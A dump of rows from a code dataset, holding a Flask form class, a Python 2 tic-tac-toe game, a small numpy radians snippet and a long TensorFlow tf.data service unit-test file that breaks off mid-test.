index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
999,300 | c85f683bc8894598ee5c09e9e021fecbbe5706c4 | from flask_wtf import Form
from wtforms import StringField
class Director(Form):
name = StringField('Name')
|
999,301 | 3f466a82a3d58c6f9f418bc7cee66acb81142253 | from fn import *
from fn2 import *
a=['1','2','3'] #Row 1
b=['4','5','6'] #Row 2
c=['7','8','9'] #Row 3
i=0
print a,'\n',b,'\n',c,'\n'
chance=input("enter 0 for first chance else press anything ")
if chance!=0:
i=1
chance=0
priority=[4,0,2,6,8,1,3,5,7]
while True:
if i%2==0:
print "player's turn"
x=input("enter positon ")
if x not in range(1,10):
print "invalid input"
continue
if x<=3:
if a[x-1]=='x' or a[x-1]=='o':
print "invalid input"
continue
a[x-1]='x'
elif x<=6:
if b[x-4]=='x' or b[x-4]=='o':
print "invalid input"
continue
b[x-4]='x'
elif x<=9:
if c[x-7]=='x' or c[x-7]=='o':
print "invalid input"
continue
c[x-7]='x'
print a,'\n',b,'\n',c,'\n'
i+=1
chance+=1
if check_c(a,b,c) or check_r(a,b,c) or check_d(a,b,c): #checking for winner
break
else:
print "cumputer's turn\n"
p=check_put_comp_r(a,b,c)
q=check_put_comp_c(a,b,c)
r=check_put_comp_d(a,b,c)
t=check_put_user_r(a,b,c)
u=check_put_user_c(a,b,c)
v=check_put_user_d(a,b,c)
s=check_opposite_corner(a,b,c)
if p!=-1:
if p<3:
a[p]='o'
elif p<6:
p-=3
b[p]='o'
else:
p-=6
c[p]='o'
elif q!=-1:
if q<3:
a[q]='o'
elif q<6:
q-=3
b[q]='o'
else:
q-=6
c[q]='o'
elif r!=-1:
if r<3:
a[r]='o'
elif r<6:
r-=3
b[r]='o'
else:
r-=6
c[r]='o'
elif t!=-1:
if t<3:
a[t]='o'
elif t<6:
t-=3
b[t]='o'
else:
t-=6
c[t]='o'
elif u!=-1:
if u<3:
a[u]='o'
elif u<6:
u-=3
b[u]='o'
else:
u-=6
c[u]='o'
elif v!=-1:
if v<3:
a[v]='o'
elif v<6:
v-=3
b[v]='o'
else:
v-=6
c[v]='o'
elif s!=-1:
if s<3:
a[s]='o'
elif s<6:
s-=3
b[s]='o'
else:
s-=6
c[s]='o'
else:
check_put_priority(a,b,c,priority)
print a,'\n',b,'\n',c,'\n'
i+=1
chance+=1
if check_c(a,b,c) or check_r(a,b,c) or check_d(a,b,c): #checking for winner
break
if chance==9: #checking for draw
print "match is draw"
break
|
999,302 | ccc286ed03c4d36c884058a41ef2ddccb12ab542 | import matplotlib.pylab as plt
import numpy as np
deg = np.arange(12.) * 30
b = np.radians(deg)
print(b) |
999,303 | d96ce47b9e3c06b3a69e5410e1b1168a8a70318c | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service ops."""
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import service_config_pb2
from tensorflow.python.data.experimental.kernel_tests.service import test_base as data_service_test_base
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import data_service_ops
from tensorflow.python.data.experimental.ops import grouping
from tensorflow.python.data.experimental.ops import testing
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variable_v1
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
TMP_WORK_DIR = data_service_test_base.TMP_WORK_DIR
NO_WORK_DIR = data_service_test_base.NO_WORK_DIR
class DataServiceOpsTest(
data_service_test_base.TestBase, parameterized.TestCase
):
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
data_service_test_base.all_cluster_configurations(),
)
)
def testDistributeBasic(self, work_dir, fault_tolerant_mode):
cluster = self.make_test_cluster(
num_workers=1,
work_dir=work_dir,
fault_tolerant_mode=fault_tolerant_mode,
)
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testDistributeInvalidCompression(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "Invalid `compression` argument"):
self.make_distributed_range_dataset(10, cluster, compression="foo")
@combinations.generate(test_base.eager_only_combinations())
def testDistributeSparse(self):
cluster = self.make_test_cluster(num_workers=1)
element = sparse_tensor.SparseTensor(
indices=[[0]],
values=constant_op.constant([0], dtype=dtypes.int32),
dense_shape=[1],
)
ds = dataset_ops.Dataset.from_tensors(element)
ds = self.make_distributed_dataset(ds, cluster)
results = [sparse_ops.sparse_tensor_to_dense(elem) for elem in ds]
self.assertAllEqual(results, [[0]])
@combinations.generate(test_base.eager_only_combinations())
def testDistributeRagged(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.from_tensor_slices([1, 5, 3, 2, 8])
ds = ds.map(math_ops.range)
ds = ds.apply(batching.dense_to_ragged_batch(2))
ds = self.make_distributed_dataset(ds, cluster)
results = [elem.to_tensor() for elem in ds]
self.assertAllEqual(results[0], [[0, 0, 0, 0, 0], [0, 1, 2, 3, 4]])
self.assertAllEqual(results[1], [[0, 1, 2], [0, 1, 0]])
self.assertAllEqual(results[2], [[0, 1, 2, 3, 4, 5, 6, 7]])
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
init_source=["textfile", "keyvaluetensor", "dataset"]
),
)
)
def testDistributeLookupTable(self, init_source):
cluster = self.make_test_cluster(num_workers=1)
initializer = self.lookupTableInitializer(init_source, [10, 11])
table = lookup_ops.StaticHashTable(initializer, -1)
ds = dataset_ops.Dataset.range(3)
ds = ds.map(table.lookup)
ds = self.make_distributed_dataset(ds, cluster)
self.evaluate(lookup_ops.tables_initializer())
self.assertDatasetProduces(ds, [10, 11, -1], requires_initialization=True)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(value_rank=[0, 1]),
)
)
def testDistributeMutableHashTable(self, value_rank):
def value(v):
for _ in range(value_rank):
v = [v, v]
return v
v1 = value(10)
v2 = value(11)
default_value = value(-1)
cluster = self.make_test_cluster(num_workers=1)
table = lookup_ops.MutableHashTable(
dtypes.int64, dtypes.int64, default_value
)
self.evaluate(table.insert([0, 1], [v1, v2]))
ds = dataset_ops.Dataset.range(3)
ds = ds.map(table.lookup)
ds = self.make_distributed_dataset(ds, cluster)
self.assertDatasetProduces(
ds, [v1, v2, default_value], requires_initialization=True
)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(shuffle_seed=[None, 10]),
)
)
def testShuffleOrder(self, shuffle_seed):
random_seed.set_random_seed(None)
num_elements = 100
cluster = self.make_test_cluster(num_workers=2)
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements, seed=shuffle_seed)
ds = self.make_distributed_dataset(ds, cluster)
output = self.getDatasetOutput(ds)
# The output will be two sequences of range(num_elements)
# non-deterministically interleaved together. If the orders of the elements
# were the same, first_order and second_order computed below will be equal.
first_order = {}
second_order = {}
for element in output:
if element in first_order:
second_order[element] = len(second_order)
else:
first_order[element] = len(first_order)
if shuffle_seed is None:
self.assertNotEqual(first_order, second_order)
else:
self.assertEqual(first_order, second_order)
@combinations.generate(test_base.default_test_combinations())
def testMultipleEpochs(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 3
ds = self.make_distributed_range_dataset(num_elements, cluster)
for _ in range(10):
self.assertDatasetProduces(ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testRepeatedDataset(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
num_repetitions = 5
ds = self.make_distributed_range_dataset(num_elements, cluster)
ds = ds.repeat(num_repetitions)
self.assertDatasetProduces(
ds, expected_output=num_repetitions * list(range(num_elements))
)
@combinations.generate(test_base.default_test_combinations())
def testConcurrentEpoch(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
num_datasets = 3
get_nexts = []
results = []
for _ in range(num_datasets):
ds = self.make_distributed_range_dataset(num_elements, cluster)
get_nexts.append(self.getNext(ds))
results.append([])
for _ in range(num_elements):
for dataset_ind in range(num_datasets):
result = self.evaluate(get_nexts[dataset_ind]())
results[dataset_ind].append(result)
for result in results:
self.assertEqual(list(range(num_elements)), result)
@combinations.generate(test_base.default_test_combinations())
def testMultiWorker(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
ds = self.make_distributed_range_dataset(num_elements, cluster)
self.assertDatasetProduces(
ds, num_workers * list(range(num_elements)), assert_items_equal=True
)
@combinations.generate(test_base.default_test_combinations())
def testFromGenerator(self):
cluster = self.make_test_cluster(num_workers=1)
def generator():
yield from range(10)
dataset = dataset_ops.Dataset.from_generator(
generator,
output_signature=tensor_spec.TensorSpec(shape=(), dtype=dtypes.int64),
)
dataset = dataset.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF, cluster.dispatcher_address()
)
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testMaxOutstandingRequests(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
ds = self.make_distributed_range_dataset(
num_elements, cluster, max_outstanding_requests=1
)
self.assertDatasetProduces(
ds, num_workers * list(range(num_elements)), assert_items_equal=True
)
@combinations.generate(test_base.eager_only_combinations())
def testInsideFunction(self):
num_workers = 3
cluster = self.make_test_cluster(num_workers=num_workers)
num_elements = 10
@def_function.function
def f():
ds = self.make_distributed_range_dataset(num_elements, cluster)
result = tensor_array_ops.TensorArray(
dtypes.int64, size=num_workers * num_elements, dynamic_size=True
)
i = 0
for elem in ds:
result = result.write(i, elem)
i += 1
return result.stack()
result = list(f().numpy())
self.assertCountEqual(num_workers * list(range(num_elements)), result)
@combinations.generate(test_base.default_test_combinations())
def testEmptyJobNameDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "`job_name` must not be empty"):
dataset_ops.Dataset.range(10).apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name="",
)
)
@combinations.generate(test_base.default_test_combinations())
def testEmptyJobNameFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset_ops.Dataset.range(10)
)
with self.assertRaisesRegex(ValueError, "`job_name` must not be empty"):
data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name="",
)
@combinations.generate(test_base.default_test_combinations())
def testNonStringJobNameDistribute(self):
cluster = self.make_test_cluster(num_workers=1)
with self.assertRaisesRegex(ValueError, "`job_name` must be a string"):
dataset_ops.Dataset.range(10).apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name=constant_op.constant("foo"),
)
)
@combinations.generate(test_base.default_test_combinations())
def testNonStringJobNameFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset_ops.Dataset.range(10)
)
with self.assertRaisesRegex(ValueError, "`job_name` must be a string"):
data_service_ops.from_dataset_id(
dataset_id=dataset_id,
processing_mode="parallel_epochs",
service=cluster.dispatcher.target,
job_name=constant_op.constant("foo"),
)
@combinations.generate(test_base.default_test_combinations())
def testSharedJobName(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 1000
def make_ds():
return dataset_ops.Dataset.range(num_elements).shuffle(num_elements)
ds1 = self.make_distributed_dataset(make_ds(), cluster, job_name="job_name")
ds2 = self.make_distributed_dataset(make_ds(), cluster, job_name="job_name")
get_next_1 = self.getNext(ds1)
get_next_2 = self.getNext(ds2)
results = []
for _ in range(num_elements // 5):
results.append(self.evaluate(get_next_1()))
results.append(self.evaluate(get_next_2()))
results += self.getIteratorOutput(get_next_1)
results += self.getIteratorOutput(get_next_2)
self.assertCountEqual(list(range(num_elements)), results)
@combinations.generate(test_base.default_test_combinations())
def testDifferentJobNames(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name1"
)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name2"
)
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, list(range(num_elements)))
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultiIteration(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
# iteration 1
self.assertDatasetProduces(ds1, list(range(num_elements)))
self.assertDatasetProduces(ds2, [])
# iteration 2
self.assertDatasetProduces(ds2, list(range(num_elements)))
self.assertDatasetProduces(ds1, [])
@combinations.generate(test_base.default_test_combinations())
def testSharedJobNameRepeat(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
num_repetitions = 3
ds1 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds1 = ds1.repeat(num_repetitions)
ds2 = self.make_distributed_range_dataset(
num_elements, cluster, job_name="job_name"
)
ds2 = ds2.repeat(num_repetitions)
results = []
get_next_1 = self.getNext(ds1)
get_next_2 = self.getNext(ds2)
for _ in range((num_elements * num_repetitions) // 5):
results.append(self.evaluate(get_next_1()))
for _ in range((num_elements * num_repetitions) // 5):
results.append(self.evaluate(get_next_2()))
results += self.getIteratorOutput(get_next_1)
results += self.getIteratorOutput(get_next_2)
self.assertCountEqual(num_repetitions * list(range(num_elements)), results)
@combinations.generate(test_base.default_test_combinations())
def testSharedJobNameRepeatEmptyJob(self):
cluster = data_service_test_base.TestCluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds1 = ds.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher_address(),
job_name="shared_job"))
ds1 = ds1.repeat()
ds2 = ds.apply(
data_service_ops.distribute(
data_service_ops.ShardingPolicy.OFF,
cluster.dispatcher_address(),
job_name="shared_job"))
ds2 = ds2.repeat()
get_next_1 = self.getNext(ds1)
for i in list(range(num_elements)) * 3:
self.assertEqual(self.evaluate(get_next_1()), i)
# Verifies ds2 is non-empty.
get_next_2 = self.getNext(ds2)
for i in list(range(num_elements)) * 3:
_ = self.evaluate(get_next_2())
@combinations.generate(test_base.eager_only_combinations())
def testSharedJobNameMultipleEpochs(self):
cluster = self.make_test_cluster(num_workers=1)
dataset = self.make_distributed_range_dataset(
10, cluster, job_name="job_name"
)
num_epochs = 5
for _ in range(num_epochs):
get_next = self.getNext(dataset)
self.assertEqual(self.getIteratorOutput(get_next), list(range(10)))
@combinations.generate(test_base.default_test_combinations())
def testStringDatasetId(self):
"""Tests passing a dataset ID of string Tensor."""
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset
)
dataset_id_str = (
dataset_id
if dataset_id.dtype == dtypes.string
else string_ops.as_string(dataset_id)
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id_str,
element_spec=dataset.element_spec,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(test_base.eager_only_combinations())
def testPyStringDatasetId(self):
"""Tests passing a dataset ID of Python string."""
cluster = self.make_test_cluster(num_workers=1)
dataset = dataset_ops.Dataset.range(10)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher.target, dataset
)
dataset_id_val = tensor_util.constant_value(dataset_id)
dataset_id_str = (
dataset_id_val.decode()
if isinstance(dataset_id_val, bytes)
else str(dataset_id_val)
)
dataset = data_service_ops.from_dataset_id(
dataset_id=dataset_id_str,
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=cluster.dispatcher.target,
job_name="job_name",
)
self.assertDatasetProduces(dataset, list(range(10)))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(job_name=[None, "test"]),
)
)
def testGcUnusedJob(self, job_name):
cluster = self.make_test_cluster(
num_workers=1, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 100
ds = self.make_distributed_range_dataset(
num_elements, cluster, job_name=job_name
)
it = iter(ds)
self.assertEqual(next(it).numpy(), 0)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
del it
while cluster.workers[0].num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcUsedJob(self):
cluster = self.make_test_cluster(
num_workers=1, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 1000
it1 = iter(
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test1"
)
)
it2 = iter(
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test2"
)
)
it3 = iter( # this iterator keeps the task alive. pylint: disable=unused-variable
self.make_distributed_range_dataset(
num_elements, cluster, job_name="test2"
)
)
self.assertEqual(cluster.workers[0].num_tasks(), 2)
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because there is still an outstanding iterator for it.
while cluster.workers[0].num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
@combinations.generate(test_base.eager_only_combinations())
def testDontGcJobsWithVisitationGuarantees(self):
cluster = self.make_test_cluster(
num_workers=1,
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
)
num_elements = 1000
it1 = iter(
self.make_distributed_range_dataset(
num_elements,
cluster,
job_name="test1",
)
)
it2 = iter(
self.make_distributed_range_dataset(
num_elements,
cluster,
job_name="test2",
processing_mode=data_service_ops.ShardingPolicy.DYNAMIC,
)
)
self.assertEqual(cluster.workers[0].num_tasks(), 2)
del it1
del it2
# Check that only the first job is gced. The second job will not be gced
# because it has a sharding policy with visitation guarantees.
while cluster.workers[0].num_tasks() > 1:
time.sleep(0.1)
self.assertEqual(cluster.workers[0].num_tasks(), 1)
@combinations.generate(test_base.eager_only_combinations())
def testGcDynamicShardingJobIfRequested(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
gc_dynamic_sharding_jobs=True,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
worker = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.DYNAMIC,
service=dispatcher.target,
)
)
it = iter(dataset)
self.assertEqual(worker._num_tasks(), 1)
del it
while worker._num_tasks() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testGcAndRecreate(self):
cluster = self.make_test_cluster(
num_workers=3, job_gc_check_interval_ms=50, job_gc_timeout_ms=20
)
num_elements = 1000
# Repeatedly create and garbage-collect the same job.
for _ in range(3):
ds = self.make_distributed_range_dataset(
num_elements, cluster, job_name="test"
)
it = iter(ds)
for _ in range(50):
next(it)
del it
# Wait for the task to be garbage-collected on all workers.
while cluster.num_tasks_on_workers() > 0:
time.sleep(0.1)
@combinations.generate(test_base.eager_only_combinations())
def testGcClient(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
client_timeout_ms=50,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
_ = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=dispatcher.target,
task_refresh_interval_hint_ms=10000,
)
)
get_next = self.getNext(dataset)
# The client does not heartbeat in 10 seconds. It will be garbage-collected.
with self.assertRaisesRegex(
errors.NotFoundError, "Unknown iteration client id"
):
self.evaluate(get_next())
time.sleep(3)
self.getIteratorOutput(get_next)
@combinations.generate(test_base.eager_only_combinations())
def testKeepClientAliveBeforeReading(self):
dispatcher = server_lib.DispatchServer(
service_config_pb2.DispatcherConfig(
protocol="grpc",
job_gc_check_interval_ms=50,
job_gc_timeout_ms=20,
client_timeout_ms=1000,
)
)
dispatcher_address = dispatcher.target.split("://")[1]
_ = server_lib.WorkerServer(
server_lib.WorkerConfig(
dispatcher_address=dispatcher_address, heartbeat_interval_ms=100
)
)
num_elements = 1000
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.apply(
data_service_ops._distribute(
processing_mode=data_service_ops.ShardingPolicy.OFF,
service=dispatcher.target,
task_refresh_interval_hint_ms=100,
)
)
get_next = self.getNext(dataset)
# The client regularly heartbeats in 100 milliseconds. It should not be
# garbage-collected even if it does not start reading in 3 seconds.
time.sleep(3)
self.assertEqual(
self.getIteratorOutput(get_next), list(range(num_elements))
)
@combinations.generate(test_base.default_test_combinations())
def testApplyDeterminismOption(self):
elements = list(range(10))
cluster = self.make_test_cluster(num_workers=1)
def dataset_fn(delay_ms):
@def_function.function
def interleave_fn(x):
ds = dataset_ops.Dataset.from_tensors(x)
if math_ops.equal(x, 0):
ds = ds.apply(testing.sleep(delay_ms * 1000))
else:
ds = ds.apply(testing.sleep(0))
return ds
ds = dataset_ops.Dataset.from_tensor_slices(elements)
ds = ds.interleave(interleave_fn, cycle_length=10, num_parallel_calls=10)
opts = options_lib.Options()
opts.deterministic = False
ds = ds.with_options(opts)
ds = self.make_distributed_dataset(ds, cluster)
return ds
self.checkDeterminism(
dataset_fn=dataset_fn,
expect_determinism=False,
expected_elements=elements,
)
def run_stateful(self, external_state_policy):
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements).map(
lambda _: random_ops.random_uniform(())
)
options = options_lib.Options()
options.experimental_external_state_policy = external_state_policy
ds = ds.with_options(options)
cluster = self.make_test_cluster(num_workers=3)
ds = self.make_distributed_dataset(ds, cluster)
self.getDatasetOutput(ds)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(
external_state_policy=[
options_lib.ExternalStatePolicy.IGNORE,
options_lib.ExternalStatePolicy.WARN,
]
),
)
)
def testStatefulNoError(self, external_state_policy):
self.run_stateful(external_state_policy)
@combinations.generate(test_base.default_test_combinations())
def testStatefulError(self):
with self.assertRaises(errors.FailedPreconditionError):
self.run_stateful(options_lib.ExternalStatePolicy.FAIL)
@combinations.generate(test_base.default_test_combinations())
def testDistributeFromInterleave(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.range(2)
def interleave_fn(x):
dataset = dataset_ops.Dataset.range(10 * x, 10 * x + 2)
dataset = self.make_distributed_dataset(dataset, cluster)
return dataset
ds = ds.interleave(interleave_fn, cycle_length=2)
self.assertDatasetProduces(ds, [0, 10, 1, 11])
@combinations.generate(test_base.default_test_combinations())
def testDistributeNonStringAddresses(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(ValueError, "`service` must be a string"):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=1
)
)
@combinations.generate(test_base.default_test_combinations())
def testDistributeEmptyAddress(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesWithLiteralMatch(
ValueError, "`service` must not be empty"
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs", service=""
)
)
@combinations.generate(test_base.default_test_combinations())
def testDistributeInvalidProtocol(self):
cluster = self.make_test_cluster(num_workers=1)
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
errors.NotFoundError,
"No credentials factory has been registered for protocol grp",
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="parallel_epochs",
service="grp://" + cluster.dispatcher_address(),
)
)
self.getDatasetOutput(ds)
@combinations.generate(test_base.eager_only_combinations())
def testDistributeInvalidProcessingMode(self):
ds = dataset_ops.Dataset.range(10)
with self.assertRaisesRegex(
ValueError,
(
"should be a `tf.data.experimental.service.ShardingPolicy`, "
'`"parallel_epochs"`, or '
"`\"distributed_epoch\"`. Got 'invalid'."
),
):
ds = ds.apply(
data_service_ops.distribute(
processing_mode="invalid", service="grpc://localhost:5000"
)
)
@combinations.generate(test_base.default_test_combinations())
def testZipDifferentProcessingModesDatasets(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
ds1 = dataset_ops.Dataset.range(num_elements)
ds1 = self.make_distributed_dataset(
ds1, cluster, processing_mode="distributed_epoch"
)
ds2 = dataset_ops.Dataset.range(num_elements)
ds2 = self.make_distributed_dataset(
ds2, cluster, processing_mode="parallel_epochs"
)
ds = dataset_ops.Dataset.zip((ds1, ds2))
self.assertDatasetProduces(
ds,
list(zip(range(num_elements), range(num_elements))),
assert_items_equal=True,
)
@combinations.generate(test_base.default_test_combinations())
def testZipDifferentProcessingModesDatasetsSharedJobName(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 100
ds1 = dataset_ops.Dataset.range(num_elements)
ds1 = self.make_distributed_dataset(
ds1, cluster, processing_mode="distributed_epoch", job_name="job_name"
)
ds2 = dataset_ops.Dataset.range(num_elements)
ds2 = self.make_distributed_dataset(
ds2, cluster, processing_mode="parallel_epochs", job_name="job_name"
)
ds = dataset_ops.Dataset.zip((ds1, ds2))
with self.assertRaisesRegex(
errors.InvalidArgumentError, "but found an existing job with diff"
):
self.getDatasetOutput(ds)
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetId(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdSharedJobs(self):
cluster = self.make_test_cluster(num_workers=2)
dataset_ids = ["dataset_1", "dataset_2"]
datasets = [
dataset_ops.Dataset.range(20, output_type=dtypes.int32),
dataset_ops.Dataset.from_tensor_slices(list(range(20, 40))),
]
for ds, dataset_id in zip(datasets, dataset_ids):
# Evaluate to ensure that in graph mode `register_dataset` is called
# before `from_dataset_id` below.
self.evaluate(
data_service_ops.register_dataset(
cluster.dispatcher_address(), ds, dataset_id=dataset_id
)
)
# Read from both jobs in parallel, with 2 consumers for each job.
data_service_datasets = []
for _ in range(2):
for dataset, dataset_id in zip(datasets, dataset_ids):
ds = data_service_ops.from_dataset_id(
"distributed_epoch",
cluster.dispatcher.target,
dataset_id,
dataset.element_spec,
job_name="shared_job",
)
data_service_datasets.append(ds)
ds = dataset_ops.Dataset.from_tensor_slices(data_service_datasets)
ds = ds.interleave(lambda x: x, cycle_length=len(data_service_datasets))
self.assertDatasetProduces(ds, list(range(40)), assert_items_equal=True)
@combinations.generate(test_base.default_test_combinations())
def testRegisteringDatasetAsTfFunction(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
register_func = def_function.function(data_service_ops.register_dataset)
dataset_id = register_func(
(
constant_op.constant("grpc"),
constant_op.constant(cluster.dispatcher_address()),
),
ds,
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
self.assertDatasetProduces(from_dataset_id_ds, list(range(num_elements)))
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdMultipleComponents(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
ds = dataset_ops.Dataset.zip({"a": (ds, ds), "b": ds})
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
from_dataset_id_ds = data_service_ops.from_dataset_id(
"parallel_epochs",
cluster.dispatcher.target,
dataset_id,
ds.element_spec,
)
output = self.getDatasetOutput(from_dataset_id_ds)
for i in range(num_elements):
self.assertEqual(i, output[i]["a"][0])
self.assertEqual(i, output[i]["a"][1])
self.assertEqual(i, output[i]["b"])
@combinations.generate(test_base.default_test_combinations())
def testFromDatasetIdWrongElementSpec(self):
cluster = self.make_test_cluster(num_workers=1)
num_elements = 10
ds = dataset_ops.Dataset.range(num_elements)
dataset_id = data_service_ops.register_dataset(
cluster.dispatcher_address(), ds
)
wrong_spec = tensor_spec.TensorSpec(shape=(), dtype=dtypes.variant)
